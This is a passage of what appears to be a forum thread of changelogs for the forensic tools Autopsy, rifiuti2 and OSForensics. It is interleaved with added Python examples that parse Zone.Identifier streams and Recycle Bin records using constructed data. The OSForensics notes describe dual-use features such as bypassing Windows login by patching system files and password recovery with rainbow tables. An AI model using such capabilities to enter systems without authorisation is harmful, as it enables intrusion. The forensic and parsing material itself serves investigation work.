Case notes are included in the HTML report.

Other:

Added a new file type that allows module writers to specify a file based on its byte range.
Data sources can be analyzed and have a CASE/UCO report generated using only the command line.

Bug Fixes:

Decreased the time required to execute inter-case common properties searches of the Central Repository.
Assorted small bug fixes are included.

http://www.sleuthkit.org/autopsy
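The Zone.Identifier parsing listed above works because Windows attaches an alternate data stream of that name to files saved by browsers and mail clients, containing the security zone the file came from and, in newer versions, the referrer and host URLs. The Python below is an added example for this thread, not Autopsy code: it parses that INI-like stream into the fields an examiner uses for provenance and derives the origin host as a correlation pivot. The zone-number table is the standard Windows URL security zone numbering; the three sample streams are constructed.

```python
from urllib.parse import urlparse

# Added example, not Autopsy code. Sample streams below are constructed.

# Security zone numbers of the Windows URL security zone model.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
KNOWN_KEYS = ("zoneid", "hosturl", "referrerurl")


def parse_zone_identifier(stream: bytes) -> dict:
    """Parse the text of a Zone.Identifier alternate data stream.

    The stream holds 'Key=Value' lines under a '[ZoneTransfer]' header. Keys are
    matched case-insensitively and only lines inside that section are trusted.
    configparser is deliberately avoided: URLs may contain '%' and other
    characters its interpolation would mangle.
    """
    fields = {}
    in_section = False
    for raw_line in stream.decode("utf-8", errors="replace").splitlines():
        line = raw_line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "zonetransfer"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()

    zone_id = int(fields["zoneid"]) if fields.get("zoneid", "").isdigit() else None
    host_url = fields.get("hosturl")
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "Unknown") if zone_id is not None else None,
        "referrer_url": fields.get("referrerurl"),
        "host_url": host_url,
        # The host the bytes were fetched from is the usual pivot for correlating
        # several downloaded files back to one source.
        "origin_host": urlparse(host_url).hostname if host_url else None,
        # Anything else (newer Windows builds add further keys) is kept verbatim.
        "extra": {k: v for k, v in fields.items() if k not in KNOWN_KEYS},
    }


def is_internet_origin(info: dict) -> bool:
    """True when the stream places the file in the Internet or Restricted zone."""
    return info["zone_id"] in (3, 4)


# Constructed sample streams (CRLF line endings as written by Windows).
SAMPLE_DOWNLOAD = (
    b"[ZoneTransfer]\r\n"
    b"ZoneId=3\r\n"
    b"ReferrerUrl=https://www.example.com/downloads/\r\n"
    b"HostUrl=https://cdn.example.com/files/setup%20tool.exe\r\n"
)
SAMPLE_MINIMAL = b"[ZoneTransfer]\r\nZoneId=3\r\n"          # older style, zone only
SAMPLE_WRONG_SECTION = b"[SomethingElse]\r\nZoneId=3\r\n"    # must not be trusted


if __name__ == "__main__":
    for name, stream in (("download", SAMPLE_DOWNLOAD),
                         ("minimal", SAMPLE_MINIMAL),
                         ("wrong_section", SAMPLE_WRONG_SECTION)):
        print(name, parse_zone_identifier(stream))
```

On a live system the stream is read as `<path>:Zone.Identifier`; from an image it appears as a named data stream of the file's MFT entry, which is what Autopsy's ingest module walks. Absence of the stream proves nothing, since archive extraction and many copy paths drop it.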
Titel: rifiuti2 0.7.0
Beitrag von: SiLæncer am 09 Mai, 2019, 17:00
(https://i.postimg.cc/bJCDmFB2/screenshot-1553.png)
Rifiuti2 analyses recycle bin files from Windows. Analysis of the Windows recycle bin is usually carried out during Windows computer forensics. Rifiuti2 can extract file deletion time, original path and size of deleted files and whether the deleted files have been moved out from the recycle bin since they were trashed.

BSD License

https://abelcheung.github.io/rifiuti2/
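The deletion time, original path and size that rifiuti2 reports for Vista and later systems live in the $I<id> index records under $Recycle.Bin\<SID>\, with the file contents in a matching $R<id>. The Python below is an added example for this thread, not rifiuti2 code: it parses both record versions (1 for Vista to 8.1 with a fixed 520-byte path, 2 for Windows 10 with a length-prefixed path) and pairs $I and $R names to spot entries whose payload has since left the bin. The record layout is as documented for those Windows versions; the records and directory listing are constructed in memory.

```python
import struct
from datetime import datetime, timedelta, timezone

# Added example, not rifiuti2 code. Sample records and listing are constructed.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    delta = dt - FILETIME_EPOCH
    return ((delta.days * 86_400 + delta.seconds) * 1_000_000 + delta.microseconds) * 10


def parse_dollar_i(data: bytes) -> dict:
    """Parse one $I record. Layout (little-endian):

      0x00  8 bytes  version: 1 (Vista to 8.1) or 2 (Windows 10)
      0x08  8 bytes  original file size
      0x10  8 bytes  deletion time as FILETIME
      0x18  v1: 520 bytes UTF-16LE path, null padded (MAX_PATH)
            v2: 4-byte path length in UTF-16 code units incl. the null, then the path
    """
    if len(data) < 24:
        raise ValueError("record shorter than the 24-byte header")
    version, size, deleted_ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + nchars * 2]
        if len(raw) != nchars * 2:
            raise ValueError("path length field exceeds record size")
    else:
        raise ValueError(f"unsupported $I version {version}")
    path = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    return {
        "version": version,
        "size": size,
        "deleted_utc": filetime_to_datetime(deleted_ft),
        "original_path": path,
    }


def pair_recycle_bin_entries(names: list) -> dict:
    """Map each $I<id> to whether its $R<id> payload is still present.

    A $I record without a $R file means the item was restored or purged after
    being trashed, the 'moved out of the recycle bin' state rifiuti2 reports.
    """
    r_ids = {n[2:] for n in names if n.startswith("$R")}
    return {n[2:]: (n[2:] in r_ids) for n in names if n.startswith("$I")}


def build_dollar_i(version: int, size: int, deleted: datetime, path: str) -> bytes:
    """Construct a $I record; used here only to produce sample data."""
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted))
    if version == 1:
        return header + path.encode("utf-16-le")[:518].ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + (path + "\x00").encode("utf-16-le")


SAMPLE_PATH = r"C:\Users\alice\Documents\report.docx"
SAMPLE_DELETED = datetime(2019, 5, 1, 12, 34, 56, tzinfo=timezone.utc)
SAMPLE_V1 = build_dollar_i(1, 12345, SAMPLE_DELETED, SAMPLE_PATH)
SAMPLE_V2 = build_dollar_i(2, 12345, SAMPLE_DELETED, SAMPLE_PATH)
# Constructed directory listing of one user's $Recycle.Bin\<SID>\ folder.
SAMPLE_LISTING = ["$IABC123.docx", "$RABC123.docx", "$IDEF456.pdf", "desktop.ini"]


if __name__ == "__main__":
    for rec in (SAMPLE_V1, SAMPLE_V2):
        print(parse_dollar_i(rec))
    print(pair_recycle_bin_entries(SAMPLE_LISTING))
```

Version 1 records are always 544 bytes, so a $I file of any other size on a Vista to 8.1 system is itself worth noting; version 2 records vary with the path length.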
Titel: OSForensics 7.0.1000
Beitrag von: SiLæncer am 31 Juli, 2019, 12:16
Changelog

    Platform support:
    OSF will no longer run on Windows XP systems. (But disk images from XP machines can still be investigated). If support for installing the software on a XP system is required, then V6 will need to be used.
    Add Device:
    Bitlocker volume details (eg. key protectors, encryption, etc) now displayed when adding a bitlocker-encrypted drive to case. Removed "Forensics Dude" from the Add Device window. The formatting of the help text was changed to the same look as the other windows.
    Android Logical:
    Fixed issue where during logical copy, some directories were not being included.
    Android Artifact:
    Removed misleading text indicating "images" can be added to scan. Added warning if adding ".vhd" (e.g. from logical copy) that it needs to be added to device first.
    Photo artifacts were only looking at the "data\com.google.android.apps.photos\db\gphotos0.db" (specified in Help File). But will now also do a quick scan for known image file extensions. Added notification to user to use File Name Search module for more advanced viewing/search options.
    MMS extracted with OSFExtract will show recipients on the message.
    Android Copy:
    Copying to a Logical Image (VHD) will no longer require a full scan to calculate disk size. This should increase its responsiveness.
    Updated OSFExtract to V1.0.1003. Change: App will transfer "canonical_address" table from mmssms.db database file, which contains the addresses (recipients) for MMS threads.
    Auto triage:
    Added configuration options for logical image creation
    Moved deleted files report export to a separate thread to improve responsiveness
    Moved recent activity report export to a separate thread to improve responsiveness
    Disabled hashing of signature file list to improve responsiveness
    Boot Virtual Machine
    Added ability to boot an image as a VM from OSForensics.
    Image to be booted can be read only, as the image file is never modified. Instead changes to the image are written to separate cache files.
    Images format support includes E01, Raw, Split images, VMDK, VHD, etc..
    Write cache files are now used in mounting when 'Restore existing disk state' is checked, so VM can be restarted where you left off
    Added new menu option in Workflow navigation, "Boot Virtual machine" with 3 tabs showing running machines, and associated drives.
    Added 'Boot Virtual Machine' icon to Start page
    User can select number of cores to allocate to the VM, RAM size and if networking is enabled. Default values are scaled based on system specs of host.
    Support for booting partition images by pre-pending an MBR image to the disk in the .vmdk file. (normally it is impossible to boot just a bare partition). This includes images that use ntldr for booting (Windows XP) and bootmgr + BCD images (Vista and above). Machines with EFI System Partitions are also supported.
    VMWare 14,15 and VirtualBox 6 are supported as hypervisors
    Host machine needs to be 64bit. Guest can be 32bit or 64bit. Guest image can be Mac OS X 10.13 (High Sierra), Windows XP to Win10 and some Linux distributions.
    Preliminary support for disks with multiple bootable partitions. Added warning text when multiple O/Ses are detected on the disk. Note: Not all permutations of multi-boot O/Ss will be supported (there are too many to test). Mac and Windows on the same disk is known to be problematic.
    Added option to bypass Windows login by patching a Windows system file and setting automatic logon option in the registry. This method is fast, but it doesn't crack the password of the user. So any files encrypted with EFS are not decrypted. As patching of system files is required, not all releases of Windows are supported. The Win 10 releases from March 2019 (17763) are known to have a problem.
    There is support for selecting which user account to auto-logon into in the case where the machine has multiple accounts.
    A new version of OSFMount is included with the package. V3.0 build 1005. This allows mounting of images as (emulated) physical drives and caching of disk writes to temp files.
    Case Manager
    Fixed bug with trailing space characters allowed in case name (causing invalid Windows folder names to be created)
    Defined new hash set flag level "major" for Project VIC
    Add info dialog when adding a Bitlocker-encrypted drive to Case
    Added new case item group for virtual machines
    Added case details tab for customizing category definitions
    Fixed an annoyance, sometimes when switching cases the OSForensics GUI will lose focus and another window will be on Top.
    Fixed a bug where sometimes the status dialog window size can appear too large while generating report.
    Reporting, "Extra Information" box will export and identify $FILE_NAME timestamps for applicable items and label it as such. Note: Applies to new items added to case. Existing items in cases will not have the extra timestamps.
    Reporting, "Skip Empty" checkbox to not include empty artifact categories in the generated reports.
    Add button for the Case Narrative (html) editor in the main Manage Case module.
    Double-clicking on virtual machine case item switches to 'Boot Virtual Machine' module and selects the VM in the list
    When deleting a device that was the case default device the default device will now be set to the first device associated with the case or the C drive if there are no more devices.
    Removed "Results of forensics analysis" and "Executive Overview" headings from case narrative / auto triage report
    When removing categories, all case items belonging to category shall be unassigned
    Categories can now have optional "Notes" property
    Added button to manage categories, when adding/editing case items, can click on 'Category' link to manage categories
    When adding or editing case items, a new category can be entered in the Category dropdown
    Separated "Offences" list and "Categories" list. Defined a new "Categories" list that reflects more common categorization types.
    Fixed bug where downloads/attachments were not being loaded into case after OSF restart.
    Removed all options other than 'Delete' when right-clicking multiple selected items
    Fixed possible crash when sorting Case Item name
    Added missing 'Raw Disk' exports to generated report
    Create Index / Browse Index
    New Indexing feature added, Optical character recognition (OCR) for PDF files. Previously this was only done on photographic images.
    Updated indexing engine, with lots of more minor changes for handling different file types & performance.
    Added ability to skip pre-scan when creating an index
    At Step 1, have all options check-marked by default except binary executable files, which don't contain much useful text.
    Fixed bug with search being prematurely truncated when indexed 0x1A character in meta data (title, description, etc.)
    Fixed bug with substring searches applying within exact phrases
    Fixed bug with exact phrase searches spanning across page SECTIONS. This caused some exact phrase searches (containing words which occur on the page many times but not in that sequence) to take extraordinarily long.
    Fixed Check/Uncheck all buttons not affecting new file type options
    Fixed buffer overflow issues & crash bugs in Browse Index (removed unnecessary dictionary counting) and when Filtering results
    Fixed bug with filenames not being indexed for PDF files and other plugin formats
    Improved error messages when failing to launch indexer
    Fixed "Failed to add folder" bug with Create Index -> Add folder
    Fixed bugs with handling multi-partition images
    Fixed bug with Index names ending with "." which caused various failures
    Fixed indexing unallocated clusters for entire disk images
    Create Signature:
    File system cache is now cleared before creating a signature in Direct Access mode. This is important for live file systems where the content is changing while OSF is running.
    Compare Signature
    Increased number of recently selected signature comparison files (displayed in drop list when selecting a signature) from 10 to 15
    When creating a hash set from a comparison there is now the option to include all files in the comparison or just new ones
    Added a new difference type of "Attributes Modified"
    Deleted Files / File Carving
    Hashing of files will only be performed for non-empty files (0 byte files are skipped).
    Improved responsiveness by not redrawing window if not visible
    Fixed a lockup that could occur
    Added new status tab while scanning to show number of files (grouped by extension) found/recovered.
    Removed message dialog when no files are found
    Checkbox added to enable/disable extensions for file carving.
    Updated FileCarver to be threaded for better performance (by adding threading to several operations). Resulted in 2.6x faster carving on a test system.
    Added option to look within a sector for header pattern match. Enabled by default (same as previous behaviour); OSF only looks at the bytes at the beginning of the sector.
    Added definition for HEIC/HEIF image file format to allow these types of images to be carved.
    Updated JPG file header definition to decrease number of false positive when carving.
    Added definition for SQLite files
    Added definition and extractors for Intel based Assembly Files (.asm)
    Added definition and extractors for .torrent, .nef (Nikon RAW Image), .orf (Olympus RAW Image), .arw (Sony RAW Image) and .raw (Leica/Panasonic RAW Image) formats
    Added header definition for FUJI Raw Image Format (.raf) and Mobile Video Format (.3gp).
    List view in Status Window showing total files found is now sortable.
    Fixed issue when "Applying Filter" was not returning (stuck in loop).
    Fixed issue with double counting files with similar header pattern.
    Drive preparation
    Fixed an open file handle from the Drive test that would prevent the data pattern write if the drive test was run first. This fixes a possible false report saying the drive was faulty, when in fact the drive was just locked
    Email Viewer:
    Fixed UI issues when minimizing and restoring windows
    ESEDB Viewer
    Changed behaviour to load all items for selected table into data buffer so we can sort columns correctly, still only displaying 1000 entries per page. Will mean a slower initial load but much faster sorting and searching.
    Columns can now be sorted by clicking on the column heading
    Added SRUDB.dat to known esedb list when opening the ESEDB viewer and fixed some date display issues for the SRUDB date / time format.
    File Name Search:
    Allow the user to enable the other four ($FILE_NAME attribute) time stamps in the File Name Search Details View.
    Added ability to create a New Preset option in the Config window. Defaults are still loaded from FileNameSearchPresets.txt file in AppData directory. User defined Presets are saved in the OSF config file, config.OSFCfg.
    Change the module icon from "disk" to "binocular" to be consistent with the main menu.
    Config, fixed bug where hash sets were not populating in the drop down selection.
    Added right-click option to show only checkmarked files.
    Added ability to include additional folders and/or exclude folders from the File Name Search.
    When switching cases, any previous search result previously performed will be cleared.
    Fixed a bug where, when enabling $FILE_NAME attributes, the horizontal scroll bar would disappear in the List View.
    Added Right-Click menu option to "Jump to Thumbnail View" from the File Details and File List tab. And "Jump to File Details" from the Thumbnail Tab.
    Started saving column ordering, visibility and size in OSF config file
    Fixed default title not being updated when adding multiple files to case
    File Previewer/Image viewer:
    Added support for single image HEIC files
    File System Browser:
    Refreshing the current folder using the F5 now clears the file system cache and allows user to see changes to live file system.
    Fixed hidden scrollbar when minimizing/restoring the window
    Fixed vector Out of bounds crash
    Forensic Imaging:
    Create a Drive Imaging queue to allow user to add other drives to image once the first imaging job is complete.
    Forensic Copy:
    Added option to add individual files to the image list instead of just only folders.
    Improved performance of looking up duplicate paths by keeping track of hashes
    Fixed copy operation not aborting after pressing 'Stop'
    Changed source list view to owner draw for better performance
    Moved total file size calculation to a separate thread for better response
    Hash Set:
    Added new built in hash sets for: Keyloggers, VPN Software, Peer to Peer (P2P) software, Cryptocurrency
    Added feature to import folder of VIC files. "Import VIC file set" will now prompt to either "import into existing active database" or "create new database". Updated import VIC feature to ignore Category: 0 which are considered Safe files
    Added support for importing V2.0 format VIC hash set.
    Added support for importing SHA1, MediaSize, LastUpdated fields from V1.3 VIC file format
    Fixed Bug with Right Click->Export to Text file output being corrupted. (Column Indexes to the ListView were not correct).
    Fixed Bug where Right Click->View with Internal Viewer was unable to open deleted files entries.
    Fixed Bug where false positive matches were being returned. (Previous result was not being cleared).
    When quitting, OSF will remember the current active hashset & reselect that hashset on startup.
    Made error message more descriptive on import failure. Fixed bug holding hash set open after failure to import that was preventing deletion.
    Fixed a bug preventing pasting folder locations into the NSRL data set input folder when importing
    Added "Delete" option from Hash Set Viewer window (right click menu)
    Added confirmation message box when deleting a hash set
    Added a more descriptive error message when an NSRL import fails due to errors in the file contents (eg invalid product number)
    Removed warning message about selecting a non-example / new hash set when importing an NSRL hash set (a new hash set is created by default when importing a NSRL hash set)
    Added more prominent highlighting when file is in hash set to highlight Project VIC hash sets
    Improved error message when failing to open .OSFHashSet file which is read only
    NSRL hash set import, added an error message when an operating system ID doesn't exist (eg corrupt/incomplete dataset). Will now add a dummy "unknown" entry and continue to import.
    Added support for highlighting files as "PF_IN_HASHSET_MAJOR" for Category 2 files
    Changed "Look up Hash Set" dialog to not close window when user cancels look up.
    Install to USB:
    Added option to exclude password recovery dictionaries and rainbow tables from USB install
    Changed out of space error message to use MB instead of bytes
    Added option to include Hash Sets to be exported during install.
    Internal Viewer
    File Info, added text to indicate if the file does not exist at the location
    Added 'Help' link. Moved 'Capture' button and 'Alt Stream' Combo box to the left
    Added preservation of 'create' and 'access' times, when available
    Fixed contents of certain .rar files not being displayed (RAR5)
    CSVReader, fixed a possible crash opening CSV files with individual elements that contain over 512 characters (element will be truncated to 511 characters now)
    Hex View, will display file slack space in internal viewer. Can enable/disable in 'Settings'.
    Hex View, fixed bug where hex view would not load and return "Unable to open file: File access is denied" when a file failed to open the underlying disk in raw mode (to load slack space). Show Slack Space is not available for resident MFT files or files on devices not added in forensics mode within OSForensics.
    Hex View, will extract strings in file slack space if show slack is enabled.
    MemViewer:
    Added warning if trying to save memory dump to a filesystem that doesn't support the file size of the dump e.g. Over 4GB on FAT32.
    Raw Memory Dump, added progress bar and estimated time remaining.
    Updated volatility compiled executable to 2.6.1 and volatility workbench to 2.1.1000 to support new profiles for Win 10 builds 17763 and 17134
    OSFDevMgr:
    Fixed buffer overflow when calling FindFirstFile() on a group device's root directory (eg. "group_device:")
    Fixed FindFirstFile() not returning the list of subdevices for a group device's root directory (eg. "group_device:")
    Fixed a crash that could occur when a badly formed system path is passed to SplitFilePath
    Password Recovery:
    Fixed an issue where passwords from the windows credential manager were returned when running using the "scan drive" option when they are only available for the "live acquisition" option
    Made some changes to the registry reading code so it is now thread safe and will work better with the auto triage.
    Started saving column ordering, visibility and size in OSF config file
    Changed LM/NT references from "(disabled)" to "(empty)"
    Added ability to add sequential decryption jobs in the Decryption & Password Recovery tab.
    40-Bit Encryption, fix for parsing output of 40-bit file.
    Windows Login Passwords, updated GUI so list views expand as the size of the main window expands.
    Enabled debug logging for run_server.exe when OSF is run in debug mode. Log can be found in run_server.exe directory while running and then is moved to the OSF documents folder when finished.
    Fixed bug that could cause possible memory corruption issue if GPU decryption is enabled.
    Fixed bug where checked item count was not being reset if "Acquire password" was clicked again
    Prefetch Viewer:
    Added all available run times to results list and exports
    Raw disk viewer:
    Fixed incorrect GPT 'Partition name' in Data Decode window
    Added option to select where (beginning, current position, end) to jump from when jumping using bytes or sectors. (Using a negative sign will jump backwards.)
    Recent Activity – Renamed to User Activity
    User Activity:
    Addition of System Resource Usage Monitor (SRUM) database scanning, will display items from the Application Resource Usage, Network Usage, Network Connectivity and Push Notifications database tables.
    Made the user activity navigation pane with the Tree view resizable.
    Started encoding HTML special characters (eg <>&) in the HTML output for some items when exporting
    P2P, Fixed crash when running on Ubuntu drive
    Changed "Show empty activity types" checkbox to default to on so empty types are displayed
    Windows search is now using the ESEDB viewer to load the windows search database, will sometimes be slower but should be more reliable (no need to repair database using esentutl which would often crash or leave database in a dirty state still).
    Installed programs, added date collection using the InstallDate registry value when available and when not available uses the last write date of the registry entry
    No longer stopping the windows search service when the windows search option is selected for a live system scan
    Added new Recycle Bin activity. Will show items in the Recycle Bin (original file path/name and date deleted).
    Added the Last-Visited and Open/Save MRU's to the MRU category: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU and NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU
    Added the other 7 run time stamps for Prefetch Files (for 8 total).
    Fixed bug with non-ascii characters for recent activities that use a sqlite database (mostly browser - chrome, firefox, opera - activities)
    Added Event Log Login Types description
    Added MRU Adobe Acrobat Reader DC Artifacts
    Added Office 16 and Office365 Word, Excel and Powerpoint Artifacts from desktop install
    MRU, Fixed crash when parsing Window's XP Registry files for OpenSave and LastVisit MRU
    Added subcategories for the various browser artifacts (Firefox, Chrome, Edge, IE, etc)
    Added checkmarks besides each artifact category. Users can then deselect any artifacts they don’t want without going into the config settings.
    Added +/- expand collapse for artifacts that have subcategories.
    Add subcategories for Windows Event Logs (OAlerts, System, Security, Application, etc.)
    Fixed bug where the number of checked items links was not being shown in the File List Tab.
    Added VLC artifacts for Windows and OSX/Mac
    Added Windows Media Player Last played and folders artifacts
    Opera, fixed opera version being read incorrectly for new versions of opera
    Opera, fixed bug stopping opera password data being read correctly
    Fixed an issue seen where no Chrome information could be retrieved when doing a live scan due to not being able to get the current windows user/profile/known folders
    Registry Viewer:
    Unknown value data types will be shown as hex data by default (previously the data was not displayed at all. Useful for looking at Windows Store App's settings.dat file which are special registry hive with non documented value data types).
    System Information:
    Removed "Get" from the Registry Commands.
    Get User Info (Registry), fixed an issue where user accounts could display "Account disabled" incorrectly
    Changed error message slightly when only live acquisition tasks are in selected list when a drive letter is chosen instead of live acquisition
    Added a quick search box to search the text of the current result tab.
    Added full name, description and password hint to “Get user information (Registry)” output
    Fix to process "Enter" key notification while using the Find Text Control.
    Thumbnail View:
    Items found in hash set are now entirely highlighted (not just text)
    Web Browser:
    Updated video download script to support recent changes at Youtube which broke video download feature.
    Misc:
    Consolidated Red/Green/Yellow bookmarks into single generic bookmark
    Renamed 'bookmarks' to 'tags'
    Added 'tag' icon to replace previous 'flag' icon
    Made some changes so OSF will start as the top most window (sometimes it would start in the background)
    Updated help file:
    Fixed bug with being unable to access Case devices as underlying drives. This caused problems reading from Bitlocker-encrypted drives
    Added ClearFileSystemCache_direct() function to clear the file system cache (for live disks). Previously changes in the live file system were not reflected in File System Browser due to caching.
    Updated 7zip DLL
    Better reporting of SQL errors with hashset databases
    Fix for bug with scroll bars in Compare Signature and Browse Index
    New logging engine when using DEBUGMODE. Has more detail and has less overhead.
    Changed warning message to be less severe when registry SAM permissions need changing on live system (for recent activity and password recovery)


http://www.osforensics.com/
Titel: Autopsy 4.12.0
Beitrag von: SiLæncer am 06 August, 2019, 21:30
Changelog

    New Features:

    Initial logical imager feature
    Changed file type detection so that Tika does not rely only on extension.

    Communications:

    Emails are threaded
    Added Account Summary view
    Added Contacts panel to show all contacts associated with an account.
    Added Media panel to show media attachments associated with an account
    Added filter to show accounts if they involved with the most recent messages.
    Added ability to draw a box on a picture while tagging it.
    Improved speed of displaying results when a column was sorted.
    Portable cases can contain files marked as Interesting Items and be compressed.
    New “Text” viewer that consolidates previous Strings and “Indexed Text” viewers.
    New “Translation” panel with integrations for Google and Bing (credentials required)
    Added Willi Ballentin’s “Registry Hive Viewer” panel to the “Application” viewer.
    Improved HTML viewer to use style sheets and better layout.
    Added paging to all views for faster loading of large data sets.


http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.0.1001
Beitrag von: SiLæncer am 13 August, 2019, 10:00
Changelog


    Create/Search Index
        Fixed file extension count at end of summary. Previously the count of files indexed, per file type, wasn't always accurate when files were found in container files, like ZIP and CHM files.
        Fixed crash bug in Create Index Log window stack corruption, when there were very long lines in the log.
        Fixed bug in "Search Index" stopping search prematurely, not returning the full set of search results for large datasets
    Create Signature
        Support for counting NTFS hard links for OSF devices using direct access. This avoids double counting of hard linked files.
    Deleted Files
        Apply Filter button will be enabled as long as MFT has been scanned even if Search was cancelled during carving (a warning message will be visible that results are incomplete).
    File viewer
        Fixed crash that could occur when rebuilding thumbnails (triggered by using an "Open file location" right click menu item in recent activity items)
    User Activity
        Rewrote export to CSV function to export data as seen in each item's list rather than trying to have each item match a preformatted output. The new CSV file will have a section for each item type with a heading row and will be separated with a blank line (eg MRU item headings, MRU items, blank line, USB item headings, usb items etc). This means a lot more data will now be exported to CSV.
        USB, Fixed parsing of Unknown USB device in registry
        USB, Added parsing of "Properties\\{83DA6326-97A6-4088-9453-A1923F573B29}" registry key to determine USB first installed, last connected, and removal times
        USB, Added parsing of Microsoft-Windows-Partition/Diagnostic.evtx event log for USB connection/disconnection events
        USB, Added parsing of archived setupapi.dev.xxxxxxxx_xxxxxx.log
        USB, Added scanning of SYSTEM\CurrentControlSet\Enum\SCSI for USB connected SCSI disks
        Added scanning for files in "Downloads" folder and scanning drive for "Zone.Identifier" alternate stream and reading the "ReferrerUrl" and "HostUrl" fields. This can help identify files that were downloaded but moved to a new folder.
        Shellbags, started processing some more item types to retrieve more information when available
        Shellbags, fixed a bug where the top level of the disk path wasn't being cleared correctly in some cases when recursively processing the ShellBagMRU leading to malformed disk path such as Desktop\A:\B\C:\ instead of Desktop\C:\
        Windows search, fixed a crash that could occur in some older versions of the windows.edb database
        Windows search, stopped directory entries from being filtered out automatically, will now be displayed in the "directory" sub type
    Misc
        Reduced program start-up time by deferring window initialization for each module to when they are first opened. OSF should launch around 3x quicker now.
        Fixed default drive not set properly on startup
        Fixed handling split image files, where the number of split file parts was > 1000 (.999 -> .1000 or .999 -> .A00). It really doesn't make sense to create split files with this many parts, but someone did it.


http://www.osforensics.com/
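The Zone.Identifier scan described under User Activity above, as an added example that is not OSForensics code: it parses the stream's [ZoneTransfer] section (ZoneId, and on newer Windows 10 builds ReferrerUrl/HostUrl) and walks a folder for files that still carry the stream but no longer sit in the Downloads directory. The sample stream contents, file names and directory arguments are constructed for illustration.

```python
"""Parse NTFS Zone.Identifier alternate data streams to trace moved downloads.

Added example, not code from OSForensics. The stream contents in SAMPLE_STREAMS
are constructed for illustration.
"""
from pathlib import Path
from typing import Optional
from urllib.parse import urlparse

# URLMON security zone ids written by browsers into the Zone.Identifier stream.
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}

# Constructed sample streams: a Windows 10 style stream with URL fields,
# an older style stream carrying only the zone, and unrelated text.
SAMPLE_STREAMS = {
    "moved_report.pdf": (
        "[ZoneTransfer]\r\n"
        "ZoneId=3\r\n"
        "ReferrerUrl=https://example.com/downloads/\r\n"
        "HostUrl=https://cdn.example.com/files/report.pdf\r\n"
    ),
    "legacy_setup.exe": "[ZoneTransfer]\nZoneId=4\n",
    "not_a_stream.txt": "hello world\n",
}


def parse_zone_identifier(text: str) -> Optional[dict]:
    """Return the ZoneTransfer fields of a Zone.Identifier stream, or None.

    Only keys inside the [ZoneTransfer] section are honoured; a UTF-8 BOM,
    CRLF line endings and ';' comment lines are tolerated.
    """
    section = None
    fields = {}
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "zonetransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()

    if "ZoneId" not in fields or not fields["ZoneId"].isdigit():
        return None
    zone_id = int(fields["ZoneId"])
    host_url = fields.get("HostUrl")
    return {
        "ZoneId": zone_id,
        "ZoneName": ZONE_NAMES.get(zone_id, "Unknown"),
        "ReferrerUrl": fields.get("ReferrerUrl"),
        "HostUrl": host_url,
        # Host the file was fetched from, when the stream records it.
        "HostName": urlparse(host_url).hostname if host_url else None,
    }


def read_zone_identifier(path: Path) -> Optional[str]:
    """Read the Zone.Identifier ADS of a file on an NTFS volume (Windows only).

    NTFS exposes the stream as "<file>:Zone.Identifier"; on other platforms,
    or for files without the stream, open() raises OSError and we return None.
    """
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def find_moved_downloads(root: Path, downloads_dir: Path) -> list:
    """Files under root that carry a Zone.Identifier stream but live outside
    downloads_dir, i.e. downloads that were moved to another folder."""
    found = []
    downloads_dir = downloads_dir.resolve()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        text = read_zone_identifier(path)
        info = parse_zone_identifier(text) if text else None
        if info and downloads_dir not in path.resolve().parents:
            found.append((path, info))
    return found


def summarise_samples() -> dict:
    """Parse the constructed samples; returns name -> parsed fields (or None)."""
    return {name: parse_zone_identifier(text) for name, text in SAMPLE_STREAMS.items()}


if __name__ == "__main__":
    for name, info in summarise_samples().items():
        print(name, "->", info)
```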
Titel: OSForensics 7.0.1002
Beitrag von: SiLæncer am 15 August, 2019, 12:00
What's new:

    Create/Search Index
        Fixed error reporting when the indexer ran out of memory, or max pages or max words were exceeded.
    Misc
        Fixed a performance issue with direct access of hard drives / images from OSForensics. This was particularly apparent when looking up multiple results from a file search in a hash set or when creating a search index.

http://www.osforensics.com/
Titel: OSForensics 7.0.1003
Beitrag von: SiLæncer am 23 August, 2019, 19:00
Changelog

    Case Logging:

    Only the first 100 characters of the case narrative will be written to the case log entry.
    Fixed bug. If Case Logging is enabled and a new log text entry was greater than 65536 characters, it could lead to crash and/or corrupt the log file. If entry is larger than allowed, the log entry (not actual contents) will now be truncated to fit.

    Create/Search Index:

    Added feature to increase Create Index threads up to 20 maximum
    Changed default indexing threads to 4 (based on benchmark results)

    Deleted Files:

    File Carving bug fix, some non-threadsafe functions could cause a crash during file carving due to multiple threads running at the same time which has now been fixed.

    Registry Viewer:

    Fixed issue with RegViewer displaying incorrect data for "Big Data" entries (where data was over 16KB for a single key).

    User Activity:

    Added MuiCache to "Installed Programs" artifact list. NOTE: working for live acquisition only currently.
    Added new artifact type “Shim Cache”


